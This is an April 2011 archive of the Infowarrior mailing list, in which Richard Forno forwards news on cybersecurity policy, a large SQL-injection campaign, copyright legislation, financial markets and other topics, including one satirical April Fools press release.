From rforno at infowarrior.org Fri Apr 1 06:41:15 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 07:41:15 -0400 Subject: [Infowarrior] - WH Announces the Partnership for Excellence in American Cybersecurity Message-ID: <37DE7315-4FCB-4D57-89B1-92B305BEBF1E@infowarrior.org> Finally, some fresh thinking on the matter.... I could very easily stand behind this effort. --- rick http://www.whitehouse.gov/the-press-office/2011/04/01/press-release-national-cybersecurity-excellence-partnership THE WHITE HOUSE Office of the Vice President ____________________________________________________________________________ For Immediate Release April 1, 2011 White House Announces the Partnership for Excellence in American Cybersecurity Washington, DC - Vice President Joe Biden announced today that President Obama has established the National Partnership for Excellence in American Cybersecurity to help address America?s growing cybersecurity concerns. "The Federal government has the responsibility to protect and defend the country, and all levels of government have the responsibility to ensure the safety and well-being of their citizens. The private sector, however, designs, builds, owns, and operates most of the network infrastructures that support government and private users alike. Industry and governments share the responsibility for the security and reliability of the infrastructure and the transactions that take place on it and should work closely together to address these interdependencies,? said the Vice President. The Partnership will consist of representatives from companies that provide information technology products, services, and consumer electronics, small businesses, non-profit organizations, and academia along with consultative participation from selected federal agencies including the Departments of Commerce and Homeland Security. The goal of the Partnership is to develop actionable recommendations, based on new thinking, fresh ideas, and research suggestions, that can help government and the private sector better protect their critical information resources. The Chairman for the Partnership will be named at a future date. In prepared remarks, President Obama acknowledged that "we are quite convinced that our vulnerabilities are increasing steadily while the costs associated with an effective attack continue to drop. What is more, the investments required to improve the situation are still relatively modest, but will rise if we procrastinate. We should attend to our critical foundations before the storm arrives, not after: Waiting for disaster will prove as expensive as it is irresponsible.? Quoting the 2009 White House Cybersecurity Policy Review, the President added that ?it is the fundamental responsibility of our government to address strategic vulnerabilities in cyberspace and ensure that the United States and the world realize the full potential of the information technology revolution. The Nation?s approach to cybersecurity over the past 15 years has failed to keep pace with the threat.? The Administration and Commission realize that due to the limited amount of federal funding available during this period of national stringency it is not practical to rediscover and report on the challenges facing American cybersecurity. Therefore, since the situation remains fairly the same as it was at the time, the Partnership will re-release the 1997 Presidential Commission on Critical Infrastructure Protection (PCCIP) report with a new logo, modern typeface, and updated list of involved organizations. The federal funds saved by not rediscovering these previously published findings and frequently repeated recommendations will be used instead by the Partnership to convene a series of town hall meetings in late 2011 that will bring together cybersecurity professionals, researchers, and pundits to reflect on exactly how successful the Nation has been in effectively addressing these oft-cited concerns pertaining to the American homeland. Contact: April Fueul (202) 456-1414 or april.fueul at eop3.whitehouse.gov. From rforno at infowarrior.org Fri Apr 1 07:02:25 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 08:02:25 -0400 Subject: [Infowarrior] - Stone & Parker tell how MPAA screws indie producers Message-ID: TorrentFreak points us to a perfect example of this in a short snippet of South Park's Matt Stone and Trey Parker talking about how the MPAA screwed them over when they were indie filmmakers when it came to ratings, but when they were working with a major studio, things were entirely different: < -- > http://www.techdirt.com/articles/20110322/04313013586/how-mpaa-screws-over-indie-filmmakers.shtml From rforno at infowarrior.org Fri Apr 1 07:27:06 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 08:27:06 -0400 Subject: [Infowarrior] - Round-up of Fed Data Dump (via Bloomberg) Message-ID: <0572015D-9F4A-4FC2-9765-86A5A782E8B1@infowarrior.org> (Translation: Never believe anything a bank says when they're in trouble. Like, obviously. --- rick) Bloomberg News is flooding the zone on the Fed?s discount-window document dump, which the central bank had to disclose after Bloomberg sued it and won. Here are a few of its stories so far: < -- > http://www.cjr.org/the_audit/audit_notes_bloomberg_on_the_f_1.php From rforno at infowarrior.org Fri Apr 1 09:15:54 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 10:15:54 -0400 Subject: [Infowarrior] - =?windows-1252?q?Report=3A_The_Rise_of_the_=93Sec?= =?windows-1252?q?ond_Internet=94_and_What_It_Means?= Message-ID: <3B2645CE-200C-40E4-8E9C-654AB179995A@infowarrior.org> The Rise of the ?Second Internet? and What It Means What is the thread that ties together the rapid rise of companies as different as Facebook, Zynga, Twitter, The Huffington Post and Quora? Wedbush Securities, a brokerage firm that analyzes the valuations of private companies, says they are all players in what it calls the ?Second Internet.? Wedbush says there are certain attributes that allow such players to grow and thrive while more traditional players ? including some of the leaders from the early days of the Internet ? fail to prosper and gradually recede into history. The most important of these attributes, the firm says, is an understanding of the value of the social web. The social nature of this new wave of Internet companies is such a major factor that Wedbush also calls it the rise of the ?Social Internet? in a new report on the sector, and says successful companies are powered by similar features, including: ? Platforms open up their API to developers ? Continuous and rapid pace of innovation (see Facebook) ? The company/brand must listen to the dialogue and participate with customers ? Customer contribution is a large percent of the value/experience ? Every customer has a personalized experience ? Social graph connections drive discovery rather than search The report looks at the value of Facebook ? comparing the growth of the company to the growth of Google ? as well as the rise of other key players such as Quora, The Huffington Post and Zynga, and how each of them effectively took over from a leader of what it calls the ?First Internet.? < -- > http://gigaom.com/2011/03/31/the-rise-of-the-second-internet-and-what-it-means/ From rforno at infowarrior.org Fri Apr 1 09:30:40 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 10:30:40 -0400 Subject: [Infowarrior] - BBC: Sites hit in massive web attack Message-ID: http://www.bbc.co.uk/news/technology-12933053 1 April 2011 Last updated at 05:34 ET Sites hit in massive web attack Hundreds of thousands of websites appear to have been compromised by a massive cyber attack. The hi-tech criminals used a well-known attack vector that exploits security loopholes on other sites to insert a link to their website. Those visiting the criminals' webpage were told that their machines were infected with many different viruses. Swift action by security researchers has managed to get the sites offering the sham software shut down. Code control Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on. Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center. The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many servers keeping websites running do not filter the text being sent to them. By formatting the text correctly it is possible to hide an instruction in it that is then injected into the databases these servers are running. In this case the injection meant a particular domain appeared as a re-direction link on webpages served up to visitors. Reports suggest that the attackers are hitting sites using Microsoft SQL Server 2003 and 2005 and it is thought that a weakness in associated web software is proving vulnerable. Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact numbers of sites hit by the attack is hard to judge but a Google search for the attackers' domains shows more than three million weblinks are displaying them. Security experts say it is the most successful SQL injection attack ever seen. Generally, the sites being hit are small businesses, community groups, sports teams and many other mid-tier organisations. Currently the re-directs are not working because the sites peddling the bogus software have been shut down. Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites. "The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote. From rforno at infowarrior.org Fri Apr 1 13:01:23 2011 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 1 Apr 2011 14:01:23 -0400 Subject: [Infowarrior] - more on: Samsung Keylogger = False Positive References: Message-ID: <0FEC167E-1904-484E-8AB1-1875866892F5@infowarrior.org> Begin forwarded message: > From: "E. Balansay" > > Have you received links regarding the Samsung Keylogger was a false positive: > > http://gizmodo.com/#!5787655/samsung-laptop-keylogger-was-a-false-positive > > Which links to: > > http://sunbeltblog.blogspot.com/2011/03/samsung-laptops-do-not-have-keylogger.html > > I believe this is the original Network World link: > http://www.networkworld.com/newsletters/sec/2011/032811sec2.html > > Interesting stuff! From rforno at infowarrior.org Sat Apr 2 16:01:58 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sat, 2 Apr 2011 17:01:58 -0400 Subject: [Infowarrior] - State Department Builds A Panic Button App Message-ID: <611EB5E3-4278-4808-9D39-3AF8B0B3DF74@infowarrior.org> State Department Builds A Panic Button App Jon Orlin 3 hours ago http://techcrunch.com/2011/04/02/state-department-builds-a-panic-button-app Imagine you are a pro-democracy protester on the streets of a repressive government. You?ve got your cellphone and you are messaging your friends. In the crowd near you, the police start making arrests. Fearing the government will confiscate your phone and investigate your contacts, you push a ?panic button? on your phone. It deletes the contacts in your address book and sends out an alert. Such an app wasn?t readily available so the U.S. State Department, acting as a venture capitalist, decided to build one. The State Department tells TechCrunch government funded work is underway to build an Android version of this ?panic button? app. No release date has been set. Another version designed to work on low-cost Nokia phones, more common in the developing world, is being considered. No iPhone app is planned for now. The special app, first reported by Reuters, is part of an initiative to promote new technologies for social activists. So far, the State Department has funded $22 million in ?Internet freedom programming.? The money goes to innovators in the form of small grants ranging from a few to tens of thousands of dollars. TechCrunch asked who was getting the money, but due to the sensitive nature of the project, the government won?t disclose names. An open, competitive bid process was used to award the grants. While the government isn?t looking for more help building these apps, they may have future projects designed to advance ?Internet Freedom? in other ways. Keep an eye on www.grants.gov for any additional info. Some of the past program objectives have included developing technology ?to enable users in closed societies to get around firewalls and filters in acutely hostile Internet environments? and training bloggers and activists to safely and anonymously participate in online forums. The effort is another example of how the administration sees the important role social media and technology has played in global politics. In 2009, the U.S. asked Twitter to delay maintenance work so real-time information about the Iranian protests could continue. The White House has also called on Egypt and Libya to restore internet blackouts. The State Department says it?s not just writing checks. The government is trying to use venture capitalist techniques to produce the best results. No, the goal is not to make 10x on the investment. But, the government is supporting a diverse portfolio of innovation rather than just funding big established technologies. It?s providing knowledge and connections, not just cash. And they are investing to incubate a new community focussed on the intersection of technology and human rights. Of course with any well intentioned program, there could be negative side effects. What happens if the panic button app gets into the wrong hands, such as drug dealers or terrorists? A State Department spokesperson tells TechCrunch it?s a legitimate concern and they are taking that into account when planning the distribution and publicity of the app. It seems TechCrunch readers won?t be a problem. From rforno at infowarrior.org Sun Apr 3 08:27:46 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 3 Apr 2011 09:27:46 -0400 Subject: [Infowarrior] - Robots Rattle Data Guru Message-ID: <399BCD7E-F1A6-4410-82B9-BFB4B8506C99@infowarrior.org> http://online.barrons.com/article/SB50001424052970203560404576228920925930788.html SATURDAY, APRIL 2, 2011 Robots Rattle Data Guru By JIM MCTAGUE | MORE ARTICLES BY AUTHOR A savvy market watcher has detected some suspicious -- and very, very fast -- automated-trading activity in March. Flash Crash 2? New robotic-trading strategies are attempting to hack futures and equities markets -- again. The suspicious activity appears unconnected to the October cyberattack on Nasdaq OMX Group (ticker: NDAQ) now being investigated by the National Security Agency. But there seems to be a new team of trading 'bots abroad -- and yes, they're distorting prices. The suspect algorithms first appeared March 2, Eric Hunsader, founder of Nanex, a Winnetka, Ill., data firm, tells Barron's. When rapid-fire automated-trading systems torched the indexes in the infamous May 6, 2010, "flash crash," Hunsader was the first to notice that the Consolidated Quote System (CQS) was running 35 seconds late. Hunsader's Nanex delivers trade data from multiple markets over the Internet to retail and institutional clients. When the New York Stock Exchange discovered gaps its trading data for May 7, 2010, it purchased Nanex data from a third-party vendor to fill in the blanks. The data are sold to institutions for back-testing. Automated systems are programmed by mathematicians whose ultra-short-term strategies have radically altered markets. And while there have been flash-crash fixes, they haven't stopped the new invaders, which are orders of magnitude faster. Hunsader theorizes that one new algorithm appears to be trading E-mini S&P 500 Futures (they're a fraction the size of standard S&P futures contracts) at the Chicago Mercantile Exchange. The algo alters the prices of related instruments, like index-based the SPDR S&P 500 (SPY) exchange-traded fund and underlying Standard & Poor's 500 stocks and options -- creating arbitrage opportunities; when it's active, the bid-ask spread on SPY as traded on Nasdaq's Philadelphia exchange sometimes widens from a penny to a dollar. The spreads on the SPY stay within a penny on other exchanges. And, says Hunsader, the algorithm instantly buys or sells enough E-mini contracts to trade through the top three levels of the electronically displayed order book in about 50 milliseconds. He detected the trading pattern on 18 days in March. The CME had no comment. Another algorithm, says Hunsader, changes order sizes at the top of the order book in about 20 to 40 stocks on Nasdaq for a few milliseconds several times a day. Each stock is traded anywhere from 2,000 to 4,000 times a second, double to quadruple the norm. The activity floods the quote system with trade data, but so far seems to cause no harm. On March 16, the CQS saw peak-volume traffic hit warp speed: a record 390,000 messages per second for all stock symbols between 11:01 a.m. and 11:02 a.m. (A year ago, such volume would have swamped the CQS, as peak capacity was 200,000 messages a second.) At 11:01:48 a.m. -- the peak of the weird trading -- 10.5% of the quotes on CQS were locked or crossed, meaning that the bid exceeded the offer. The next second, it was 13%. Usually, about 3% of trades are crossed. Hunsader wonders why the exchanges are not saying that they are worried. This is all too similar to what happened during the 2010 flash crash, causing the delay that went unnoticed by regulators and market experts -- despite all their monitoring equipment. Meanwhile, CQS has been upgraded to handle 750,000 messages a second; by July, total capacity will be one million messages per second... What helps legit trading will also help fast hackers. From rforno at infowarrior.org Sun Apr 3 17:56:10 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 3 Apr 2011 18:56:10 -0400 Subject: [Infowarrior] - =?windows-1252?q?Alzheimer=92s_Studies_Show_Genet?= =?windows-1252?q?ic_Links?= Message-ID: April 3, 2011 Alzheimer?s Studies Show Genetic Links By GINA KOLATA http://www.nytimes.com/2011/04/04/health/04alzheimer.html The two largest studies of Alzheimer?s disease have led to the discovery of no fewer than five genes that provide intriguing new clues to why it strikes and how it progresses. Researchers say the studies, which analyzed the genes of more than 50,000 people in the United States and Europe, leave little doubt that the five genes make the disease more likely in the elderly and have something important to reveal about the disease?s process. ?The level of evidence is very, very strong,? said Dr. Michael Boehnke, a professor of biostatistics at the University of Michigan and an outside adviser on the research. The two studies are being published Monday in the journal Nature Genetics. By themselves, the new genes are not nearly as important a factor as APOE, a gene discovered in 1995 that greatly increases risk for the disease: by 400 percent if a person inherits a copy from one parent, by 1,000 percent if from both parents. In contrast, each of the new genes increases risk by no more than 10 to 15 percent; for that reason, they will not be used to decide if a person is likely to develop Alzheimer?s. APOE, which is involved in metabolizing cholesterol, ?is in a class of its own,? said Dr. Rudolph Tanzi, a neurology professor at Harvard Medical School and an author of one of the papers. But researchers say that for understanding the disease and developing new therapies, a slight increase in risk is more than sufficient. And like APOE, some of the newly discovered genes appear to be involved with cholesterol. Others are linked to inflammation or the transport of molecules inside cells. For years , there have been unproven but persistent hints that cholesterol and inflammation are part of the disease process. People with high cholesterol are more likely to get the disease. Strokes and head injuries, which make Alzheimer?s more likely, also cause brain inflammation. The new discoveries double the number of genes known to be involved in Alzheimer?s, to 10 from 5. One of the papers? 155 authors, Dr. Richard Mayeux, chairman of neurology at Columbia University Medical Center, said the findings would ?open up the field.? And an expert who was not part of the studies, Dr. Nelson B. Freimer, who directs the U.C.L.A. Center for Neurobehavioral Genetics, said there were now enough unequivocal genes for Alzheimer?s disease that researchers could make real progress in figuring out its biology. ?This is a big, solid step,? he said. Of the 10 genes now associated with Alzheimer?s in old age, four were found in the past few years and are confirmed by the new studies. APOE may have other roles in the disease, perhaps involved in clearing the brain of chemicals that pile up in plaques, the barnacle-like particles that dot the brain of Alzheimer?s patients and are the one unique pathological feature of the disease. It is known that one of the first signs of Alzheimer?s disease is an accumulation of amyloid beta, or a-beta, a protein that forms plaques. And it is known that later in the disease, twisted and tangled proteins known as tau appear in dead and dying nerve cells. But what is not known is why a-beta starts to accrue, why the brains of people with Alzheimer?s cannot get rid of its excess, or what is the link between amyloid and tau. One of the new papers, by American investigators, analyzed the genes of 54,000 people, some with Alzheimer?s and others of the same age but without the disease. They found four new genes. The other paper is by researchers in Britain, France and other European countries with contributions from the United States. They confirmed the genes found by the American researchers and added one more gene. The American study got started about three years ago when Gerard D. Schellenberg, a pathology professor at the University of Pennsylvania, went to the National Institutes of Health with a complaint and a proposal. Individual research groups had been doing their own genome studies but not getting much because no one center had enough subjects. In an interview, Dr. Schellenberg said he told Dr. Richard J. Hodes, director of the National Institute on Aging, that the small genomic studies had to stop, and Dr. Hodes agreed. These days, Dr. Hodes said, ?the old model in which researchers jealously guarded their data is no longer applicable.? So Dr. Schellenberg set out to gather all the data he could on Alzheimer?s patients and on healthy people of the same ages. The idea was to compare one million positions on each person?s genome to determine whether some genes were more common in those who had Alzheimer?s. ?I spent a lot of time being nice to people on the phone,? Dr. Schellenberg said. He got what he wanted: nearly every Alzheimer?s center and Alzheimer?s geneticist in the country cooperated. Dr. Schellenberg and his colleagues used the mass of genetic data to do an analysis and find the genes and then, using two different populations, to confirm that the same genes were conferring risk in those groups. That helped assure the investigators that they were not looking at a chance association. It was a huge effort, Dr. Mayeux said. Many medical centers had Alzheimer?s patients? tissue sitting in freezers. They had to extract the DNA and do genome scans. ?One of my job was to make sure the Alzheimer?s cases really were cases,? Dr. Mayeux said ? ?that they had used some reasonable criteria? for diagnosis. ?And I had to be sure that people who were unaffected really were unaffected.? But once the project got going, ?we all realized we have to make this happen, it just had to happen,? he continued. ?Everyone wanted to collaborate.? Meanwhile, the European group, led by Dr. Julie Williams of the School of Medicine at Cardiff University, was engaged in a similar effort. Dr. Schellenberg said the two groups compared their results and were reassured that they were largely finding the same genes. ?If there were mistakes, we wouldn?t see the same things,? he added. Now the European and American groups are pooling their data to do an enormous study, looking for genes in the combined samples. ?We are upping the sample size,? Dr. Schellenberg said. ?We are pretty sure more stuff will pop out.? From rforno at infowarrior.org Sun Apr 3 18:04:20 2011 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 3 Apr 2011 19:04:20 -0400 Subject: [Infowarrior] - OMB prepares for open gov sites to go dark in May Message-ID: <96F2F69C-67D1-4273-B56E-2E6ACFD662BA@infowarrior.org> OMB prepares for open gov sites to go dark in May March 31, 2011 - 2:46pm PrintEmail By Jason Miller Executive Editor Federal News Radio http://www.federalnewsradio.com/?nid=35&sid=2327798 Many of the Obama administration's top open government initiatives are set to be turned off by May 31. Government sources confirm that the Office of Management and Budget is planning to take seven websites dark in two months because of a lack of funding. One government official, who requested anonymity because they didn't get permission to discuss the topic, said funding will begin to run out on April 20 for public sites IT Dashboard, Data.gov and paymentaccuracy.gov. The source said OMB also is planning on shutting down internal government sites, including Performance.gov, FedSpace and many of the efforts related the FEDRamp cloud computing cybersecurity effort. The official said two other sites, USASpending.gov and Apps.gov/now, will run through July 30 but go dark soon after. "We need at least another $4 million just to keep USASpending.gov operating this year," the official said. "We are looking at a pass-the-hat approach, but it could be challenging to get that done in time." The White House requested $35 million for the e-government fund in 2011. The House allocated only $2 million in its bill, H.R. 1. The Senate, meanwhile, would provide $20 million for the e-government fund. "The continuing resolution says we can only spend what we would reasonably expect to get during the fiscal year, and we have no reasonable expectation to get more than a couple of millions of dollars," the source said. OMB and the General Services Administration, which manages the e-gov fund, already spent $1.63 million last fall on the recipient reporting feature of USASpending.gov. OMB and GSA now can only spend $370,000 the rest of the year on these initiatives. A request to OMB for comment on the sites going dark was not returned. Proposed cuts to e-gov despite cost-savings Federal Chief Information Officer Vivek Kundra said recently that the IT Dashboard has helped save the government $3 billion on IT projects. "Using this important tool, we identified underperforming high priority IT projects and began an intensive review of these programs, eliminating ineffective projects, reconfiguring others, and targeting IT expenditures more carefully," he said in a video promoting the IT Dashboard's benefits. The lack of House support for e-government also doesn't bode well for the administration's $50 million request for the Integrated, Efficient, and Effective Uses of Information Technology (IEEUIT) program. The Senate approved $40 million in its version of the 2011 spending bill. The House doesn't discuss this fund specifically. Kundra said in a March 17 hearing before the House Appropriations Subcommittee on Financial Services and General Government that the IEEUIT fund is devoted on cracking down on duplicative systems and increasing the number of large scale IT projects they are reviewing. Kundra announced Thursday that OMB is moving to an open source model for the IT Dashboard and for the TechStat toolkit. Kundra did not say if the budget was part of the reason for the move-only that he wants to tap into the collective ideas to improve both tools and other governments want to implement these processes. "The detrimental effect of HR 1 on so many areas of government is clear?and perhaps no more so than on the efforts to ensure the government's IT infrastructure upgrades are proceeding on schedule and on budget," said Rep. Jose Serrano (D-N.Y.), ranking member of the House Appropriations Subcommittee on Financial Services and General Government. "We cannot have a more streamlined, efficient and open government without using the best technology available. Unfortunately the cuts in H.R. 1 to e-government fund will have the unintended consequence of making government less accountable and transparent." Requests for comment to the chairman of the House Appropriations Committee were not returned. Pro-transparency groups fight cuts Several industry and good government groups have been trying to drum up support for these e-government initiatives. The Sunlight Foundation sent a letter to House and Senate appropriators as well as each chamber's leadership explaining why these programs are so important. "Basically what the letter says is this is the way to find out what's going on in Congress, this is the way to find out where tax dollars going and this way to figure out what the government is doing," said Daniel Schuman, a policy counsel with Sunlight, during an interview on In Depth with Francis Rose Wednesday. He said that if the sites go dark, the data will eventually go out of date and the efforts to clean up and make the information more useful also will stop. "If it were to go away, agencies could perhaps post the information on their website," Schuman said. "But because of the way government websites are set up, it could be difficult or impossible for people to access information they've already grown accustomed to using. A lot of people built programs to gather information from Data.gov, and they would have to go back and rework what they do." The White House is reaching out to members on the Hill. "It's been an annual challenge to get congressional support for the e-government fund," said Tim Young, a former OMB official and now a director with Deloitte Consulting. "One of reasons that it's been challenging in getting the e-government fund fully appropriated is what some say are a void in the tangible political constituency. Some in Congress say it's a nice to have but an unnecessary fund." He added that the benefits of the programs are realized across the government but because the money is not given to a specific program or agency, there are some who argue that dilutes the benefits of the programs. Sen. Joseph Lieberman (I-Conn.), the author of the E-Government Act of 2003, which created the e-gov fund, has long been a steady supporter of Congress providing full funding. "Economic conditions demand wise budget decisions, but cutting money from multiple federal IT programs is penny-wise and pound foolish," said Leslie Phillips, a spokeswoman for the Senate Homeland Security and Governmental Affairs Committee, which Lieberman is the chairman of. "Programs that modernize technology ultimately improve management and save taxpayers billions of dollars. Transparency and e-government programs encourage public participation in government. Small investments in IT modernization can reap enormous rewards, which is why Senator Lieberman opposes the proposed cuts to the e-gov fund and the administration's IT reform efforts." Young said cutting the funding in the short term will cost the government in the long run. "Inconsistency in funding has a potential negative impact especially if agencies are meeting fixed schedules or deployments," he said. "In many cases, changes to the schedule increases the government's costs." Others say despite bipartisan support, it's still a matter of educating the appropriators about the benefits of these sites. "Generally there have been many criticisms about the quality of data but at this stage of the effort, two years in, what's happening if you terminate these sites the ability to improve the quality of information and information vendors are seeking will be completely eliminated," said Fred Corle, senior director for strategic marketing at KGS, Inc. "Clearly with the budget situation and election in November, there are pressures put upon Congress to balance the budget or at least move in that direction and that is a major driver. But there are certainly some merits to providing this kind of information." Corle added the potential shutdown of the USASpending site would have a big impact on the government's transparency efforts as well as on vendors. "There has been a lot of work in terms of data quality and pulling sites down at this stage of evolution would stunt it," he said. Young said if the IT Dashboard goes dark it would have a significant impact on oversight of the $80 billion IT budget. "It's a small investment, maybe $2 million or $3 million to help provide oversight of $80 billion," he said. "I'd expect in the mid-term that some of those oversight responsibilities will go away and a lack of accountability at the program level may ensue." Budget constraints at odds with e-gov efforts Dan Chenok, a former OMB official and now a senior fellow with IBM's Center for the Business of Government, said the administration remains committed to a transparency and open government agenda, but it's getting caught up in the budget constraints. Chenok said if the funding gets cut there are several other ways OMB could ensure these sites are kept running. "As for other options, I'm not sure what is being considered, but historically there have been other manners and methods to use funding to support activities," he said. "These include interagency transfers under the Economy Act, working capital funds, carry over support from multi-year funding for technology and additionally vehicles that could be used. The administration would have to work with Congress and other stakeholders to make them work." Young said what OMB does should the sites go dark will be interesting. "What would be telling if these cuts endure," he said. "Will OMB make an attempt to fund through alternative sources such as interagency funding through the CIO or CFO councils, or will agencies take ownership of certain programs until the funding can be restored?" Schuman and others say a lot depends on what comes from the latest efforts to keep the government running past April 8. Budget discussions between the White House and Congress are advancing and could include $33 billion in reductions. (Copyright 2011 by FederalNewsRadio.com. All Rights Reserved.) From rforno at infowarrior.org Mon Apr 4 11:25:28 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 4 Apr 2011 12:25:28 -0400 Subject: [Infowarrior] - KSM to be tried by military commission at Gitmo Message-ID: <6D7C7EEC-630E-40EF-A3DD-19DC462BCB12@infowarrior.org> April 4, 2011 11:33 AM KSM to be tried by military commission at Gitmo; Holder set to make announcement today (Credit: AP) Updated at 12:05 p.m. ET http://www.cbsnews.com/8301-503544_162-20050405-503544.html?tag=contentMain;contentBody Attorney General Eric Holder today will announce that self-proclaimed Sept. 11 mastermind Khalid Sheikh Mohammad will be tried in a military commission, CBS News has learned. A source says the commission will be held at the Guantanamo Bay prison. Trying Mohammed in a civilian court and closing the Guantanamo prison were once some of the Obama administration's top priorities, but political realities have hamstrung both goals. In November 2009, Holder announced that Mohammed and four other alleged Sept. 11 plotters would be tried in New York City, but he scrapped that plan in the wake of public consternation. Republicans and some others in Washington said the decision compromised national security, while a CBS News poll at the time showed that most Americans thought such suspects should be tried in a closed military court. Holder said on CBS' "Face the Nation" last July that he preferred trying the alleged terrorists in civilian court because the United States has an "extremely capable" court system that has proven effective in these kind of cases. "I think there's a lot of misinformation out there. We have proven an ability to hold in our federal prison system people convicted of, charged with terrorist offenses very effectively, very safely," he said. Congress in the past year has tried to undermine the administration's goal of closing Guantanamo by restricting funding for such policy changes. Meanwhile, the case of Ahmed Ghailani, the first Guantanamo detainee to be tried in civilian court, last year cracked open the debate over how to bring to justice detainees in the "war on terror." Ghailani was convicted of one conspiracy charge but acquitted of more than 280 other charges related to his role in the 1998 bombings of U.S. embassies in Africa. From rforno at infowarrior.org Mon Apr 4 15:15:06 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 4 Apr 2011 16:15:06 -0400 Subject: [Infowarrior] - "Big Content" Is Strangling American Innovation Message-ID: <6A6F28F2-E7EC-4445-BFD0-8EB753592E76@infowarrior.org> "Big Content" Is Strangling American Innovation 11:45 AM Thursday March 31, 2011 by James Allworth http://blogs.hbr.org/cs/2011/03/big_content_is_strangling_amer.html Innovation has emerged as a key means by which the US can pull itself out of this lackluster economy. In the State of the Union, President Obama referred to China and India as new threats to America's position as the world's leading innovator. But the threats are not just external. One of the greatest threats to the US's ability to innovate lies within: specifically, with the music and movie business. These Big Content businesses are attempting to protect themselves from change so aggressively that they risk damaging America's position as a world leader in innovation. Many in the high technology industry have known this for a long time. Despite making their living relying on it, the Big Content players do not understand technology, and never have. Rather than see it as an opportunity to reach new audiences, technology has always been a threat to them. Example after example abounds of this attitude; whether it was the VCR which was "to the American film producer and the American public as the Boston strangler is to the woman home alone" as famed movie industry lobbyist Jack Valenti put it at a congressional hearing, or MP3 technology, which they tried to sue out of existence. In fact, it's possible to go back as far as the gramophone and see the content industries rail against new technology. The reason why? Every shift in technology is difficult for them. Just as they work out how to make money using one technology, it changes. The sensible thing for them to do would be to learn how to deal with the change. Instead, their approach to every generation of technology is either to attempt to stymie it so badly that nobody wants it, or to stop it altogether through their influence with lawmakers in Washington DC. Now, in the past, these efforts might have impacted technology that only involved the consumption of movies and music. But as the technology used to display movies and listen to music converges with other technology ? technology where America has historically led ? Big Content's attempts to protect their business model threaten innovation at the very heart of America's competitive advantage. Let's take a look at one specific example: the industry's repeated attempts to introduce innovation-chilling legislation. The latest is COICA, designed to allow the Government to take down any website that infringers copyright ? and lock the domain. Fortunately, a number of American legislators have taken a more clear-headed view of the problem. It was defeated late last year in Congress, after being described by Senator Ron Wyden as a "bunker buster cluster bomb." But it's back again. In a recent interview, Silicon Valley Congressman Zoe Lofgren describes the back and forth with the content industry and their requests for legislation like COICA as increasingly draconian. These laws won't just have the power to stop copyright infringers. They have the potential to stop legitimate uses that the content industries don't like ? examples like YouTube and even the early MP3 players are examples of legitimate uses that big content have gone after. As Senator Wyden put it: "the collateral damage of this statute could be American innovation, American jobs, and a secure Internet." The result of laws like this? Startups ? the engine of America's growth ? will just go elsewhere. China and India are creating environments extremely conducive to disruptive innovation. Even Europe is benefiting ? one of the most promising recent music services, Spotify, is hosted in Europe. It's still not available to American consumers. Unfortunately, a subset of what COICA proposes is already in existence today. Immigrations and Customs Enforcement (known as ICE) has been simply seizing domains of websites suspected of copyright infringement at taxpayer expense. Because of the sheer number of sites the content industries want taken down, they innovated ? by bypassing due process altogether. ICE have taken down entire sites for only linking to files ? for example, torrent-finder.com. The sites have no opportunity to stop this process until after they have been taken down. If you're the next YouTube, would you want to locate here in the US and risk having the government simply switch off your site at the behest of Big Content? Or might it not be easier to find a more benign environment to create your business in? The ultimate irony in all of this is that if we stop giving the content industries what they want ? sweeping, blanket protections ? we may actually be doing them a favor. They wanted the VCR banned. It turned out to be one of the most profitable technologies for the movie industry in its history. Ignoring their requests may turn out to be cruel to be kind ? instead of focusing on trying to fight the technology, they'll be forced to find ways of profitably embracing it. The next generation of technology companies are already starting to shift overseas. Before conceding to any more demands for protection from Big Content, America would do well to consider what it places at risk. James Allworth is a Fellow at the Forum for Growth and Innovation at Harvard Business School. From rforno at infowarrior.org Mon Apr 4 20:47:44 2011 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 4 Apr 2011 21:47:44 -0400 Subject: [Infowarrior] - Lawmakers renew push for "rogue websites" bill Message-ID: Lawmakers renew push for "rogue websites" bill Mon Apr 4, 5:59 pm ET http://news.yahoo.com/s/nm/20110404/wr_nm/us_usa_trade_websites/print WASHINGTON (Reuters) ? A bipartisan group of lawmakers from both chambers of Congress on Monday vowed to pass legislation giving the U.S. Justice Department new authority to go after foreign and domestic websites that sell pirated music and movies and counterfeit goods. "Online infringement and the sale of counterfeit goods cost American creators, producers, and businesses billions of dollars and results in the loss of hundreds of thousands of jobs," Senate Judiciary Committee Chairman Patrick Leahy, a Democrat, told reporters. Intellectual property theft is "one of the greatest threats to our economy today" because of the big role that copyrights, patents and trademarks play in boosting U.S. exports and productivity, said House of Representatives Judiciary Committee Chairman Lamar Smith, a Republican. "If we're going to have a healthy economy, we need to have a healthy IP sector," Smith said. Leahy said he would push forward with a new version of a "rogue websites" bill that cleared his committee last year by a vote of 19-O but did not get a vote in the full Senate. The House Judiciary Committee will hold a second hearing this week on the issue, with the goal of crafting its own legislation, Smith said. "I think with the leadership of both chairmen we're going to get a bill to the president's desk," Leahy said. Many websites selling pirated and fake goods operate out of China, although lawmakers said their efforts were not aimed at any particular country. U.S. labor and business groups backed the renewed push. "Too few people who download entertainment illegally recognize that they are stealing wages and benefits from workers," said Paul Almeida, president of the AFL-CIO labor federation's department for 